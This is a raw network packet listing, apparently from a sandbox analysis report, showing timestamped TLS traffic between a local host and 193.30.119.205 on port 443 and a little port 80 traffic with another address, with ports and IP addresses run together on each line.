                                                                                                                                                                                Nov 25, 2024 14:07:02.128223896 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.131066084 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.131134987 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.131144047 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.135097027 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.135154963 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.135195971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.138384104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.138434887 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.138465881 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.142637968 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.142690897 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.142730951 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.145822048 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.145875931 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.145898104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.149147034 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.149238110 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.149271011 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.179900885 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.271856070 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.271869898 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.271953106 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.271987915 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.274914980 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.274951935 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.274964094 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.274983883 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.275027037 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.278944969 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.278956890 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.279009104 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.279037952 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.281987906 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.282044888 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.282054901 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.285167933 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.285227060 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.285235882 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.289336920 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.289393902 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.289402962 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.292229891 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.292279959 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.292289972 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.295447111 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.295521021 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.295531034 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.299349070 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.299392939 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.299401999 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.302921057 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.302973986 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.302983046 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.306009054 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.306055069 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.306063890 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.309257030 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.309309006 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.309319019 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.313153982 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.313206911 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.313215971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.316283941 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.316333055 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.316342115 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.319406986 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.319459915 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.319470882 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.323764086 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.323817015 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.323827028 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.412417889 CET8049171172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.412467957 CET4917180192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:02.535341978 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.535413027 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762213945 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762224913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762298107 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762311935 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762325048 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762367964 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762387991 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762435913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762485981 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762495041 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762506962 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762546062 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762556076 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762573957 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762619019 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762628078 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762939930 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762984037 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762990952 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.318072081 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.320215940 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.320291042 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.320297956 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.322844028 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.322910070 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.322916985 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.326245070 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.326343060 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.326350927 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.485598087 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.485747099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.485795021 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.487687111 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.487750053 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.487770081 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.490076065 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.490138054 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.490166903 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.492667913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.492758989 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.492775917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.495208979 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.495284081 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.495299101 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.498545885 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.498637915 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.498651981 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.501377106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.501461983 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.501492977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.504252911 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.504328966 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.504343987 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.507230043 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.507330894 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.507344007 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.509932995 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.510009050 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.510021925 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.512995005 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.513072014 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.513087034 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.515906096 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.515976906 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.515990973 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.519123077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.519201994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.519215107 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.521626949 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.521713018 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.521725893 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.524162054 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.524528980 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.524542093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.527491093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.527587891 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.527601957 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.685329914 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.685405970 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.685458899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.687983990 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.688050032 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.688066959 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.691195011 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.691267967 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.691298008 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.693893909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.693964005 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.693979025 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.697674990 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.697734118 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.697748899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.699959040 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.700032949 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.700040102 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.702512980 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.702574968 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.702581882 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.705976963 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.706042051 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.706049919 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.708811998 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.708884954 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.708893061 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.711416960 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.711493015 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.711522102 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.714309931 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.714391947 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.714404106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.717592955 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.717672110 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.717685938 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.720143080 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.720220089 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.720232964 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.722853899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.722923994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.722937107 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.726429939 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.726497889 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.726511002 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.729259014 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.729337931 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.729352951 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.887114048 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.887176037 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.887209892 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.889667988 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.889750957 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.889770985 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.892282009 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.503091097 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.503184080 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.503196955 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.505803108 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.505882978 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.505896091 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.509150982 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.509237051 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.509252071 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.511861086 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.511946917 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.511962891 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.514497042 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.514583111 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.514605045 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.518045902 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.518138885 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.518174887 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.520848036 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.520926952 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.520947933 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.523401022 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.523477077 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.523494959 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.526120901 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.526206970 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.526222944 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.529467106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.529556990 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.529571056 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.532145977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.532232046 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.532250881 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.691384077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.691482067 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.691546917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.693300009 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.693375111 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.693392038 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.695979118 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.696043015 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.696054935 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.699291945 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.699367046 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.699382067 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.702095032 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.702191114 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.702213049 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.705262899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.705365896 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.705389977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.708036900 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.708121061 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.708152056 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.710519075 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.710566998 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.710592031 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.710642099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.713927984 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.713995934 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.714030027 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.716523886 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.716597080 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.716630936 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.719461918 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.719525099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.719547987 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.722330093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.722434044 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.722455978 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.725616932 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.725701094 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.725723982 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.728271961 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.728360891 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.728377104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.731034040 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.731123924 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.731131077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.734412909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.734484911 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.734517097 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.892462015 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.892540932 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.892579079 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.894618988 CET44349168193.30.119.205192.168.2.22
